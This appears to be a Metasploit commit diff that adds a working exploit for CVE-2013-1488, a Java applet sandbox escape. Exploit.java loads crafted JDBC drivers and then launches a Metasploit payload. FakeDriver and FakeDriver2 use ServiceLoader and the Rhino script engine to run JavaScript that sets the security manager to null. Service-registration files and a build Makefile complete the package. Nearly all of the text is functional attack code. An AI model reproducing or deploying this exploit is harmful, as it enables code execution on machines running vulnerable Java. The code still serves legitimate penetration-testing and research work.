Add module for CVE-2013-1488

data/exploits/cve-2013-1488/META-INF/services/java.lang.Object

@@ -0,0 +1 @@
+com.sun.script.javascript.RhinoScriptEngine

data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver

@@ -0,0 +1,2 @@
+FakeDriver
+FakeDriver2

external/source/exploits/cve-2013-1488/Exploit.java

@@ -0,0 +1,41 @@
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.sql.*;
+//import java.lang.Runtime;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+
+    public void init()
+    {
+        try
+        {
+            System.out.println("Here we go...");
+			String url = "jdbc:msf:sql://127.0.0.1:8080/sample";
+			String userid = "userid";
+			String password = "password";
+            Connection con = DriverManager.getConnection(url, userid, password); 
+        }
+        catch(Exception localThrowable)
+        {
+            //localThrowable.printStackTrace();
+        }
+        try {
+			Payload.main(null);
+			//Runtime.getRuntime().exec("calc.exe");
+			
+		} catch(Exception ex) {
+			//ex.printStackTrace();
+		}
+    }
+
+    public void paint(Graphics paramGraphics)
+    {
+        paramGraphics.drawString("Loading", 50, 25);
+    }
+}

external/source/exploits/cve-2013-1488/FakeDriver.java

@@ -0,0 +1,65 @@
+import java.sql.*;
+import java.util.logging.Logger;
+import java.util.Properties;
+import java.util.AbstractSet;
+import java.util.ServiceLoader;
+import java.util.Iterator;
+
+
+public class FakeDriver extends AbstractSet implements java.sql.Driver
+{
+    public static final String URL_PREFIX = "jdbc:msf:sql:";
+	public static ServiceLoader _s1;
+	
+    static {
+		_s1 = ServiceLoader.load(Object.class);
+    }
+    
+    public Iterator iterator()
+    {
+		return _s1.iterator();
+	}
+    
+    public FakeDriver() {
+	}
+
+    public final boolean acceptsURL(String url)
+        throws SQLException
+    {
+        return true;
+    }
+    
+	public final boolean jdbcCompliant() {
+        return true;
+    }
+ 
+    public final Logger getParentLogger() {
+		return null;
+	}
+	
+    public final int getMinorVersion() {
+        return 0;
+    }
+    
+	public final int getMajorVersion() {
+        return 1;
+    }
+    
+    public final DriverPropertyInfo[] getPropertyInfo(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+    
+    
+    public final Connection connect(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+
+	//AbstractSet
+	public final int size() {
+		return 2;
+	}
+}

external/source/exploits/cve-2013-1488/FakeDriver2.java

@@ -0,0 +1,70 @@
+import java.sql.*;
+import java.util.logging.Logger;
+import java.util.Properties;
+import java.util.HashSet;
+import java.util.Iterator;
+import javax.script.*;
+import java.io.*;
+import java.lang.*;
+
+public class FakeDriver2 extends HashSet implements java.sql.Driver
+{
+    public static final String URL_PREFIX = "jdbc:msf:sql:";
+
+    static {
+
+    }
+        
+    public FakeDriver2() {
+		Iterator i = FakeDriver._s1.iterator();		
+		try {
+			ScriptEngine e = (ScriptEngine)i.next();
+			Object proxy = (Object) e.eval(
+				"this.toString = function() {" +
+				"	java.lang.System.setSecurityManager(null);" +
+				"	return '';" +
+				"};" +
+				"e = new Error();" +
+				"e.message = this;" +
+				"e");
+			this.add(proxy);
+		} catch (Exception ex) {
+			//ex.printStackTrace();
+		}	
+	}
+
+    public final boolean acceptsURL(String url)
+        throws SQLException
+    {
+        return true;
+    }
+    
+	public final boolean jdbcCompliant() {
+        return true;
+    }
+ 
+    public final Logger getParentLogger() {
+		return null;
+	}
+	
+    public final int getMinorVersion() {
+        return 0;
+    }
+    
+	public final int getMajorVersion() {
+        return 1;
+    }
+    
+    public final DriverPropertyInfo[] getPropertyInfo(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+        
+    public final Connection connect(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+
+}

external/source/exploits/cve-2013-1488/META-INF/services/java.lang.Object

@@ -0,0 +1 @@
+com.sun.script.javascript.RhinoScriptEngine

external/source/exploits/cve-2013-1488/META-INF/services/java.sql.Driver

@@ -0,0 +1,2 @@
+FakeDriver
+FakeDriver2

external/source/exploits/cve-2013-1488/Makefile

@@ -0,0 +1,19 @@
+CLASSES = \
+	Exploit.java  \
+	FakeDriver.java \
+    FakeDriver2.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/cve-2013-1488/
+	mv FakeDriver.class ../../../../data/exploits/cve-2013-1488/
+	mv FakeDriver2.class ../../../../data/exploits/cve-2013-1488/
+	cp -r META-INF ../../../../data/exploits/cve-2013-1488/
+
+clean:
+	rm -rf *.class